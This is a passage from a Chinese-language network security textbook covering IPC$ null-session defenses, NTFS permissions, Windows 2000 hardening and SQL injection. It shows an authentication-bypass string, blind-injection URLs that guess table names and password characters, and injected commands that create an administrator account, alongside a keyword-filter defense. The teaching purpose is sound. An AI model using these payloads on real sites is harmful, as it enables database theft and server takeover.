er〕；5對(duì)方未啟動(dòng)NetLogon，它支持網(wǎng)絡(luò)上計(jì)算機(jī)pass-through帳戶登錄身份；6對(duì)方禁止了NBT〔即未翻開(kāi)139端口〕；7對(duì)方防火墻屏蔽了139和445端口；8你的用戶名或者密碼錯(cuò)誤〔顯然空會(huì)話排除這種錯(cuò)誤〕；9命令輸入錯(cuò)誤：可能多了或少了空格，當(dāng)用戶名和密碼中不包含空格時(shí)兩邊的雙引號(hào)可以省略，如果密碼為空，可以直接輸入兩個(gè)引號(hào)“〞即可；10如果在已經(jīng)建立好連接的情況下對(duì)方重啟計(jì)算機(jī)，那么ipc$連接將會(huì)自動(dòng)斷開(kāi)，需要重新建立連接。2.3空會(huì)話攻擊的防御

有如下方法：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous。在Windows2000中將值改為“2〞，表示限制所有的匿名訪問(wèn)，除非明確許可。禁止自動(dòng)翻開(kāi)默認(rèn)共享。 對(duì)于Windows2000Pro來(lái)說(shuō)，修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AUTOShareWks〔DWORD〕的鍵值該為00000000。如果主鍵不存在，就新建一個(gè)再修改鍵值。 server版:找到如下主鍵[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer〔DWORD〕的鍵值改為:00000000。關(guān)閉ipc$和默認(rèn)共享依賴的效勞:server效勞

操作：控制面板-管理工具-效勞-找到server效勞〔右擊〕-屬性-常規(guī)-啟動(dòng)類型-選已禁用

這時(shí)可能會(huì)有提示說(shuō)：XXX效勞也會(huì)關(guān)閉是否繼續(xù)，因?yàn)檫€有些次要的效勞要依賴于lanmanserver，不要管它。屏蔽139，445端口

由于沒(méi)有以上兩個(gè)端口的支持，是無(wú)法建立ipc$的，因此屏蔽139，445端口同樣可以阻止ipc$入侵。 注意：如果屏蔽掉了以上兩個(gè)端口，你將無(wú)法用ipc$入侵別人。設(shè)置復(fù)雜密碼，防止通過(guò)ipc$窮舉出密碼3NTFS文件系統(tǒng)

3.1優(yōu)勢(shì)長(zhǎng)文件名支持對(duì)文件目錄的平安控制先進(jìn)的容錯(cuò)能力不易受到病毒和系統(tǒng)崩潰的侵襲3.2NTFS權(quán)限設(shè)置多重權(quán)限中應(yīng)該遵循以下幾個(gè)原那么：用戶對(duì)資源的有效權(quán)限是分配給該個(gè)人用戶帳戶和用戶所屬的組的所有權(quán)限的總和。如果用戶對(duì)文件具有“讀取〞權(quán)限，該用戶所屬的組又對(duì)該文件具有“寫入〞的權(quán)限，那么該用戶就對(duì)該文件同時(shí)具有“讀取〞和“寫入〞的權(quán)限。文件權(quán)限高于文件夾權(quán)限。NTFS文件權(quán)限對(duì)于NTFS文件夾權(quán)限具有優(yōu)先權(quán)，假設(shè)你能夠訪問(wèn)一個(gè)文件，那么即使該文件位于你不具有訪問(wèn)權(quán)限的文件夾中，你也可以進(jìn)行訪問(wèn)〔前提是該文件沒(méi)有繼承它所屬的文件夾的權(quán)限〕拒絕高于其他權(quán)限。拒絕權(quán)限可以覆蓋所有其他的權(quán)限。甚至作為一個(gè)組的成員有權(quán)訪問(wèn)文件夾或文件，但是該組被拒絕訪問(wèn)，那么該用戶本來(lái)具有的所有權(quán)限都會(huì)被鎖定而導(dǎo)致無(wú)法訪問(wèn)該文件夾或文件。也就是說(shuō)上面第一點(diǎn)的權(quán)限累積原那么將失效。4文件系統(tǒng)加密與保護(hù)

4.1文件系統(tǒng)加密4.2文件系統(tǒng)保護(hù)

Windows2000提供了兩種方式對(duì)系統(tǒng)文件進(jìn)行保護(hù)，一種是瀏覽保護(hù)，一種是文件保護(hù)。瀏覽保護(hù)文件保護(hù) “Windows文件保護(hù)〞能阻止替換受保護(hù)的系統(tǒng)文件，這些受保護(hù)的文件包括.sys、.dll、.exe、.ttf等系統(tǒng)文件。5平安恢復(fù)5.1平安恢復(fù)造成系統(tǒng)崩潰的原因可能有很多種：硬件問(wèn)題，硬件的物理?yè)p壞導(dǎo)致系統(tǒng)無(wú)法工作。病毒破壞，由于病毒、木馬軟件對(duì)系統(tǒng)的破壞造成系統(tǒng)崩潰。程序問(wèn)題，由于安裝新軟件產(chǎn)生兼容性問(wèn)題導(dǎo)致系統(tǒng)崩潰。人為失誤，由于人為的操作失誤對(duì)系統(tǒng)的破壞導(dǎo)致系統(tǒng)無(wú)法工作。人為破壞，人為的惡意破壞導(dǎo)致系統(tǒng)的癱瘓。自然災(zāi)害，又不可抗拒的問(wèn)題導(dǎo)致系統(tǒng)崩潰，如火災(zāi)等常見(jiàn)的恢復(fù)機(jī)制主要有以下幾點(diǎn)：創(chuàng)立系統(tǒng)緊急修復(fù)盤 開(kāi)始->程序->附件->系統(tǒng)工具->備份定期將系統(tǒng)中的重要數(shù)據(jù)進(jìn)行備份5.2平安設(shè)置Windows2000的平安子系統(tǒng)由本地平安策略、平安賬號(hào)管理器、平安證明監(jiān)視器三局部組成。他們包括如下一些主要組件：平安參考監(jiān)視器〔SRM，SecurityReferenceMonitor〕：Windows2000執(zhí)行程序〔\Winnt\System32\Ntoskrnl.exe〕中的一個(gè)部件，負(fù)責(zé)執(zhí)行對(duì)對(duì)象的平安訪問(wèn)檢查本地平安認(rèn)證子系統(tǒng)〔Lsass，LocalSecurityAuthoritySubsystem〕：運(yùn)行在\Winnt\System32\Lsass.exe映像下的用戶模式進(jìn)程，負(fù)責(zé)本機(jī)系統(tǒng)平安策略〔例如，哪個(gè)用戶允許登錄此機(jī)，口令策略、用戶和組的特權(quán)授予和系統(tǒng)平安審計(jì)設(shè)置等〕、用戶認(rèn)證和發(fā)送平安審計(jì)消息到事件日志。本機(jī)平安授權(quán)效勞〔Lsasrv-\Winnt\System32\Lsasrv.dll〕實(shí)現(xiàn)了大局部的功能。Lsass策略數(shù)據(jù)庫(kù)：包含本機(jī)系統(tǒng)平安策略設(shè)置的數(shù)據(jù)庫(kù)。該數(shù)據(jù)庫(kù)存儲(chǔ)在注冊(cè)表HKLM\SECURITY下。平安帳號(hào)管理器〔SAMSecurityAccountsManager〕效勞：負(fù)責(zé)管理包括本機(jī)上定義的用戶名和組的數(shù)據(jù)的一組子程序。SAM效勞由\Winnt\System32\Samsrv.dll實(shí)現(xiàn)，運(yùn)行在Lsass進(jìn)程下。SAM數(shù)據(jù)庫(kù)：包含定義的用戶和組以及口令及其他屬性信息的數(shù)據(jù)庫(kù)。該數(shù)據(jù)庫(kù)保存在注冊(cè)表HKLM\SAM下?；顒?dòng)目錄〔ActiveDirectory〕：一種目錄效勞，包含保存在域中對(duì)象信息數(shù)據(jù)庫(kù)。域是由一組計(jì)算機(jī)和它們相關(guān)的平安組組成的?；顒?dòng)目錄保存域內(nèi)對(duì)象的信息：包括用戶、組和計(jì)算機(jī)。口令信息和域用戶和組的特權(quán)信息保存在活動(dòng)目錄中?；顒?dòng)目錄效勞器由\Winnt\System32\Ntdsa.dll實(shí)現(xiàn)，運(yùn)行在Lsass進(jìn)程下。登錄過(guò)程：〔LogonProcess-Winlogon〕：運(yùn)行\(zhòng)Winnt\System32\Winlogon.exe的用戶模式進(jìn)程。負(fù)責(zé)響應(yīng)平安提示序列〔SAS，SecurityAttentionSequence〕和管理交互登錄會(huì)話。網(wǎng)絡(luò)登錄效勞〔NetLogonService-Netlogon〕：運(yùn)行在Lsass中的Win32效勞〔\Winnt\System32\Netlogon.dll〕，負(fù)責(zé)對(duì)MicrosoftLANManager2WindowsNT〔前Windows2000〕的網(wǎng)絡(luò)登錄請(qǐng)求進(jìn)行響應(yīng)。內(nèi)核平安設(shè)備驅(qū)動(dòng)器〔KsecDD，KernerlSecurityDeviceDriver〕：內(nèi)核模式函數(shù)庫(kù)，負(fù)責(zé)實(shí)現(xiàn)本地過(guò)程調(diào)用接口。其他內(nèi)核模式平安組件，包括加密文件系統(tǒng)，用它同用戶模式下的Lsass進(jìn)行通信。KsecDD位于\Winnt\System32\Drivers\Ksecdd.sys。Windows2000的平安設(shè)置可以大致分為用戶平安設(shè)置、密碼平安設(shè)置、系統(tǒng)平安設(shè)置、效勞平安設(shè)置四個(gè)方面。用戶平安設(shè)置禁用Guest帳號(hào)。限制不必要的用戶。創(chuàng)立兩個(gè)管理員帳號(hào)。把系統(tǒng)Administrator賬號(hào)改名。把共享文件的權(quán)限從Everyone組改成授權(quán)用戶。開(kāi)啟用戶策略。不讓系統(tǒng)顯示上次登錄的用戶名。密碼平安設(shè)置使用平安密碼。設(shè)置屏幕保護(hù)密碼。開(kāi)啟密碼策略。系統(tǒng)平安設(shè)置使用NTFS格式分區(qū)。運(yùn)行防毒軟件。關(guān)閉默認(rèn)共享。鎖住注冊(cè)表。利用Windows2000的平安配置工具來(lái)配置平安策略。效勞平安設(shè)置關(guān)閉不必要的端口。設(shè)置好平安記錄的訪問(wèn)權(quán)限。禁止建立空連接。第五章腳本攻擊與防御1SQL注入技術(shù)什么是SQL注入技術(shù)？ SQL注入即是指攻擊者通過(guò)在應(yīng)用程序中預(yù)先定義好的查詢語(yǔ)句結(jié)尾加上額外的SQL語(yǔ)句元素，欺騙數(shù)據(jù)庫(kù)效勞器執(zhí)行非授權(quán)的任意查詢。分析一個(gè)經(jīng)典的SQL注入漏洞dimrsadmin1=request("admin")password1=request("password")setrs=server.CreateObject("ADODB.RecordSet")rs.open"select*fromadminwhereadmin='"&admin1&"'andpassword='"&password1&"'",conn,1ifrs.eofandrs.bofthenresponse.write"<SCRIPTlanguage=JavaScript>alert('用戶名或密碼不正確！');"response.write"javascript:history.go(-1)</SCRIPT>"response.endelsesession("admin")=rs("admin")session("password")=rs("password")session("aleave")=rs("aleave")response.redirect"admin.asp"endifrs.closesetrs=nothing一個(gè)經(jīng)典的SQL注入漏洞分析在用戶名和密碼那里都填入‘OR‘’=’，SQL語(yǔ)句被構(gòu)造成

select*fromadminwhereadmin=‘'OR‘'=‘'

and

password=‘'OR‘'=‘‘意思是當(dāng)admin為空或者空等于空，password為空或者空等于空的時(shí)候整個(gè)查詢語(yǔ)句就為真。如何來(lái)修補(bǔ)漏洞？過(guò)濾掉其中的特殊字符。這里我們就過(guò)濾掉其中的單引號(hào)“'〞，即是把程序的頭兩行改為：admin1=replace(trim(request("admin")),"'","")password1=replace(trim(request("password")),"'","")判斷數(shù)據(jù)庫(kù)的類型效勞器的IIS錯(cuò)誤提示沒(méi)關(guān)閉提交://localhost/test/onews.asp?id=37’：1、如果是Access數(shù)據(jù)庫(kù)，那么應(yīng)該返回：MicrosoftJETDatabaseEngine錯(cuò)誤'80040e14'字符串的語(yǔ)法錯(cuò)誤在查詢表達(dá)式'id=37''中。/onews.asp，行82、如果是SQLServer數(shù)據(jù)庫(kù)，那么應(yīng)該返回：MicrosoftOLEDBProviderforODBCDrivers錯(cuò)誤'80040e14'[Microsoft][ODBCSQLServerDriver][SQLServer]字符串''之前有未閉合的引號(hào)。/onews.asp，行8效勞器的IIS錯(cuò)誤提示關(guān)閉了 根據(jù)Access和SQLServer自己的系統(tǒng)表來(lái)區(qū)分。Access是在系統(tǒng)表[msysobjects]中，但在Web環(huán)境下讀該表會(huì)提示“沒(méi)有權(quán)限〞，SQLServer是在表[sysobjects]中，在Web環(huán)境下可正常讀取。 提交：://localhost/test/onews.asp?id=37and(selectcount(*)fromsysobjects)>0如果是Access數(shù)據(jù)庫(kù)，因?yàn)椴淮嬖趕ysobjects表，所以返回結(jié)果應(yīng)該和正常頁(yè)面有很大區(qū)別；如果是SQLServer，那么應(yīng)該返回一個(gè)查詢成功的正常頁(yè)面。1.1Access數(shù)據(jù)庫(kù)的注入把IE菜單=>工具=>Internet選項(xiàng)=>高級(jí)=>顯示友好HTTP錯(cuò)誤信息前面的勾去掉，這樣可以顯示出現(xiàn)的錯(cuò)誤信息。分析一次完整的SQL注入。<%owen=request("id")

Setrsnews=Server.CreateObject("ADODB.RecordSet")sql="updatenewssethits=hits+1whereid="&cstr(request("id"))conn.executesqlsql="select*fromnewswhereid="&owenrsnews.Opensql,conn,1,1title=rsnews("title")ifrsnews.eofandrsnews.bofthenresponse.Write("數(shù)據(jù)庫(kù)出錯(cuò)")else%>://localhost/test/onews.asp?id=37://localhost/test/onews.asp?id=37and1=2 sql=select*fromnewswhereid=37and1=2://localhost/test/onews.asp?id=37and1=1://localhost/test/onews.asp?id=37and0<>(selectcount(*)fromadmin) 猜測(cè)是否存在admin表://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(pass)>0)猜測(cè)是否存在pass字段://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(password)>0)://localhost/test/onews.asp?id=37and(selectasc(mid(password,1,1))fromadmin)>100假設(shè)pssword字段中第一個(gè)記錄的第一位的ASCII碼大于100，如果假設(shè)正確那么應(yīng)該返回正常頁(yè)面猜測(cè)password字段是否存在防止SQL注入(1)在效勞端正式處理之前對(duì)提交數(shù)據(jù)的合法性進(jìn)行檢查；(2)封裝客戶端提交信息；(3)替換或刪除敏感字符/字符串；(4)屏蔽出錯(cuò)信息。第一種方法DimTc_Post,Tc_Get,Tc_In,Tc_Inf,Tc_Xh '定義需要過(guò)濾的字串Tc_In="'|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|or|char|declare"Tc_Inf=split(Tc_In,"|")'處理post數(shù)據(jù)IfRequest.Form<>""ThenForEachTc_PostInRequest.FormForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.Form(Tc_Post)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('請(qǐng)不要在參數(shù)中包含非法字符嘗試注入！');</Script>"'處理get數(shù)據(jù)IfRequest.QueryString<>""ThenForEachTc_GetInRequest.QueryStringForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.QueryString(Tc_Get)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('請(qǐng)不要在參數(shù)中包含非法字符嘗試注入！');</Script>"1.2SQLServer數(shù)據(jù)庫(kù)的注入判斷帳號(hào)的權(quán)限帳戶有三種不同的權(quán)限：Sa權(quán)限、Db_owner權(quán)限、Public權(quán)限://localhost/test/onews.asp?id=37;and(selectcount(*)fromsysobjects)>0and1=(selectIS_SRVROLEMEMBER(’sysadmin’));--

如果返回正常的話就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶是Sa權(quán)限and1=(selectIS_MEMBER('db_owner'));--

如果返回正常的話就說(shuō)明數(shù)據(jù)庫(kù)連接帳戶就是db_owner權(quán)限Sa權(quán)限下的注入Web和數(shù)據(jù)庫(kù)在一臺(tái)效勞器上 在這種情況下又可以分為幾種情況：沒(méi)有防火墻阻隔直接拿系統(tǒng)權(quán)限;exec'netuserhelen123456/add';--

;exec'netlocalgroupadministratorshelen/add';--

無(wú)法直接連接效勞器 取得webshell。 什么是webshell？ 所謂webshell就是一個(gè)asp或php木馬后門，黑客在入侵了一